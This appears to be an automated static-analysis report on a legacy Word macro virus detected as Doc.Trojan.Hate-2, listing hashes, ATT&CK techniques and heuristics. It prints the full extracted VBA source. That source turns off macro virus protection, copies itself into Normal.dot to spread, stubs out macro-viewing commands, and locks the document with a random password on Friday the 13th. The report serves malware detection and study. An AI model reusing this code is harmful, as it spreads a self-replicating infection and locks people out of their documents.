Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3168731320e87f7c…

MALICIOUS

Office (OLE)

Size: 29.0 KB
Created: 1998-02-08 15:30:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: cb7d8efc6607567b58d38e01fb106382
SHA-1: ca04f1107d3df12885888c134a0998fffacd17b6
SHA-256: 3168731320e87f7cc6d7ed4d27b74c25116aebaf03694f46ffc31d7e18a3c5ce
Risk score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a legacy Word document containing a VBA macro module named 'Hate' with an AutoOpen subroutine. On open, the macro disables Word's built-in macro virus protection and auto-macro blocking, then copies itself into the Normal.dot template and back into the active document (saving the document as a template), which is how it persists on the host and spreads to other documents. The presence of legacy WordBasic macro-virus markers and the ClamAV detection 'Doc.Trojan.Hate-2' further support its malicious nature. The macro also contains a payload branch that password-protects the document when it is opened on a Friday the 13th (WeekDay(Now()) = 6 And Day(Now()) = 13); the 15-character password is generated from random characters at run time, so the document is effectively locked.

Heuristics (4)

  • ClamAV: Doc.Trojan.Hate-2 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Hate-2
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    Document contains an AutoOpen macro, which Word runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1808 bytes
SHA-256: f82b5bdf9e74116c4bcfd2dd3d35de58cb8f32dd1bc853ad3486d7e83e01d3cb
Detection
ClamAV: Doc.Trojan.Hate-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hate"
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Hate.AutoOpen"
On Error Resume Next

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros = 0
    Options.VirusProtection = False

    If bNormalCheck = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Hate", Object:=wdOrganizerObjectProjectItems
        NormalTemplate.Save
    End If

    If bDocCheck = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Hate", Object:=wdOrganizerObjectProjectItems
        ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate
    End If

If WeekDay(Now()) = 6 And Day(Now()) = 13 Then
    For i = 1 To 15
        RndChr = Int(Rnd() * (255 - 32) + 32)
        Pw = Pw + Chr$(RndChr)
    Next
    ActiveDocument.Password = Pw
End If

End Sub

Function bNormalCheck()
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "Hate" Then bNormalCheck = True
    Next
End Function

Function bDocCheck()
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Hate" Then bDocCheck = True
    Next
End Function

Sub ToolsMacro()
End Sub

Sub FileTemplates()
End Sub

Sub ViewVBCode()
End Sub